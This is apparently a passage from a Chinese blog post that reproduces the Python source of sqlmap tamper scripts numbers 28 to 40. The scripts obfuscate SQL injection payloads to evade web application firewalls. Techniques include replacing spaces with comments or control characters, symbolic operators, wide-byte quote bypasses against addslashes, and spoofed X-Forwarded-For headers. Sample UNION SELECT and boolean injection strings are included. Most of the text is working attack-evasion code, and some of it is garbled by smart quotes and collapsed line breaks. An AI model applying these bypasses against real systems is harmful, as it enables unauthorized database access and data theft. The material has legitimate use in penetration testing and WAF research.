Requirement: * MySQL >= 5.1.13 Tested against: * MySQL 5.1.41 Notes: * Useful to bypass several web application firewalls * Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html >>> random.seed(0) >>> tamper('1 AND 9227=9227') '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227' """ def process(match): word = match.group('word') randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr)) else: return match.group() retVal = "" if payload: payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload) for i in xrange(len(payload)): if payload[i].isspace(): randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "%%23%s%%0A" % randomStr elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] break else: retVal += payload[i] return retVal
29.space2mssqlblank 针对MSSQL使用特定的字符替换空格
特定的字符(‘%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a random blank character from a
valid set of alternate characters
Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 Notes: * Useful to bypass several web application firewalls >>> random.seed(0) >>> tamper('SELECT id FROM users') 'SELECT%0Eid%0DFROM%07users' """ # ASCII table: # SOH 01 start of heading # STX 02 start of text # ETX 03 end of text # EOT 04 end of transmission # ENQ 05 enquiry # ACK 06 acknowledge # BEL 07 bell # BS 08 backspace # TAB 09 horizontal tab # LF 0A new line # VT 0B vertical TAB # FF 0C new page # CR 0D carriage return # SO 0E shift out # SI 0F shift in blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A') retVal = payload if payload: retVal = "" quote, doublequote, firstspace, end = False, False, False, False for i in xrange(len(payload)): if not firstspace: if payload[i].isspace(): firstspace = True retVal += random.choice(blanks) continue elif payload[i] == '\'': quote = not quote elif payload[i] == '"': doublequote = not doublequote elif payload[i] == '#' or payload[i:i + 3] == '-- ': end = True elif payload[i] == " " and not doublequote and not quote: if end: retVal += random.choice(blanks[:-1]) else: retVal += random.choice(blanks) continue retVal += payload[i] return retVal
30.space2mssqlhash 使用%23%0A来替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a pound character (‘#’) followed by
a new line (‘\n’)
Requirement: * MSSQL * MySQL Notes: * Useful to bypass several web application firewalls >>> tamper('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227' """ retVal = "" if payload: for i in xrange(len(payload)): if payload[i].isspace(): retVal += "%23%0A" elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] break else: retVal += payload[i] return retVal
31.space2mysqlblank 针对MYSQL使用特定的字符来替换空格
特定的字符(‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’)
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a random blank character from a
valid set of alternate characters
Requirement: * MySQL Tested against: * MySQL 5.1 Notes: * Useful to bypass several web application firewalls >>> random.seed(0) >>> tamper('SELECT id FROM users') 'SELECT%0Bid%0DFROM%0Cusers' """ # ASCII table: # TAB 09 horizontal TAB # LF 0A new line # FF 0C new page # CR 0D carriage return # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) blanks = ('%09', '%0A', '%0C', '%0D', '%0B') retVal = payload if payload: retVal = "" quote, doublequote, firstspace = False, False, False for i in xrange(len(payload)): if not firstspace: if payload[i].isspace(): firstspace = True retVal += random.choice(blanks) continue elif payload[i] == '\'': quote = not quote elif payload[i] == '"': doublequote = not doublequote elif payload[i] == " " and not doublequote and not quote: retVal += random.choice(blanks) continue retVal += payload[i] return retVal
32.space2mysqldash 针对MYSQL使用–%0A来替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a dash comment (‘–’) followed by
a new line (‘\n’)
Requirement: * MySQL * MSSQL Tested against: Notes: * Useful to bypass several web application firewalls. >>> tamper('1 AND 9227=9227') '1--%0AAND--%0A9227=9227' """ retVal = "" if payload: for i in xrange(len(payload)): if payload[i].isspace(): retVal += "--%0A" elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] break else: retVal += payload[i] return retVal
33.space2plus 主要用于使用+替换空格符
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with plus (‘+’)
Notes:
* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwards
* This tamper script works against all databases
tamper(‘SELECT id FROM users’)
‘SELECT+id+FROM+users’
“””
retVal = payload
if payload:
retVal = “”
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += “+”
continue
elif payload[i] == ‘\”:
quote = not quote
elif payload[i] == ‘”’:
doublequote = not doublequote
elif payload[i] == ” ” and not doublequote and not quote:
retVal += “+”
continue
retVal += payload[i]
return retVal
34.space2randomblank主要用”%09”, “%0A”, “%0C”, “%0D”替换注入中的空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a random blank character from a
valid set of alternate characters
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
random.seed(0)
tamper(‘SELECT id FROM users’)
‘SELECT%0Did%0DFROM%0Ausers’
“””
# ASCII table:
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
blanks = (“%09”, “%0A”, “%0C”, “%0D”)
retVal = payload
if payload:
retVal = “”
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += random.choice(blanks)
continue
elif payload[i] == ‘\”:
quote = not quote
elif payload[i] == ‘”’:
doublequote = not doublequote
elif payload[i] == ’ ’ and not doublequote and not quote:
retVal += random.choice(blanks)
continue
retVal += payload[i]
return retVal
35.symboliclogical 该插件主要是在and被过来后使用&& 以及||
def tamper(payload, **kwargs):
“””
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
tamper(“1 AND ‘1’=’1”)
“1 %26%26 ‘1’=’1”
“”“
retVal = payload if payload: retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) return retVal
36.unionalltounion 该插件主要是替换掉union all select 里面的all
def tamper(payload, **kwargs):
“””
Replaces UNION ALL SELECT with UNION SELECT
tamper(‘-1 UNION ALL SELECT’)
‘-1 UNION SELECT’
“”“
return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload
37.unmagicquotes 主要用在宽字节注入,绕过magic_quotes/addslashes
def tamper(payload, **kwargs):
“””
Replaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)
Notes:
* Useful for bypassing magic_quotes/addslashes feature
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
tamper(“1’ AND 1=1”)
‘1%bf%27– ’
“”“
retVal = payload if payload: found = False retVal = "" for i in xrange(len(payload)): if payload[i] == '\'' and not found: retVal += "%bf%27" found = True else: retVal += payload[i] continue if found: _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) if _ != retVal: retVal = _ retVal += "-- " elif not any(_ in retVal for _ in ('#', '--', '/*')): retVal += "-- " return retVal
38.varnish 主要是用于X-originating-IP可以绕过部分认证
def tamper(payload, **kwargs):
“””
Append a HTTP header ‘X-originating-IP’ to bypass
WAF Protection of Varnish Firewall
Notes:
Reference: http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366
Examples:
X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
X-remote-IP: * or %00 or %0A
“”“
headers = kwargs.get("headers", {}) headers["X-originating-IP"] = "127.0.0.1" return payload
39.versionedmorekeywords 该插件主要是在mysql敏感词两旁加/!%s/
tamper(‘1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#’)
‘1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/,/!CONCAT/(/!CHAR/(58,122,114,115,58),/!IFNULL/(CAST(/!CURRENT_USER/()/!AS//!CHAR/),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#’
“”“
def process(match): word = match.group('word') if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "/*!%s*/" % word) else: return match.group() retVal = payload if payload: retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")
40.xforwardedfor.py 该插件主要用于随机xforwardedfor
def randomIP():
numbers = []
while not numbers or numbers[0] in (10, 172, 192):
numbers = sample(xrange(1, 255), 4)
return ‘.’.join(str() for in numbers)
def tamper(payload, **kwargs):
“””
Append a fake HTTP header ‘X-Forwarded-For’ to bypass
WAF (usually application based) protection
“”“
headers = kwargs.get("headers", {}) headers["X-Forwarded-For"] = randomIP() return payload
相关文章推荐
- 细读《Effective C++》之十一
- 细读文章:C#中的委托和事件
- 长沙南雅中学一新生发言稿,值得所有家长细读哦。
- hdu 4462 Scaring the Birds(暴力,细读)
- Objective-C Runtime[细读]
- 详解Hive-CliDriver——细读Hive源码(二)
- 细读《Effective C++》之六
- 细读《Effective C++》之十二
- 细读cow.osg
- ajax 和jsonp 不是一码事 细读详解
- 拜读了《婆媳关系好坏取决于老公》一文,看似有道理,细读感觉其实应该不是那么回事
- 关于多线程的研究,文章有理有据 值得细读
- 详解Hive-CliDriver续——细读Hive源码(三)
- 细读《Effective C++》之七
- 细读《Effective C++》之十三
- 记事本 程序(52-79行需细读)
- 非常励志的一篇文章,请慢慢细读,品读,从中找到你想要的答案
- ajax 和jsonp 不是一码事 细读详解
- 定制sqlmap tamper脚本
- 详解Hive-Driver——细读Hive源码(四)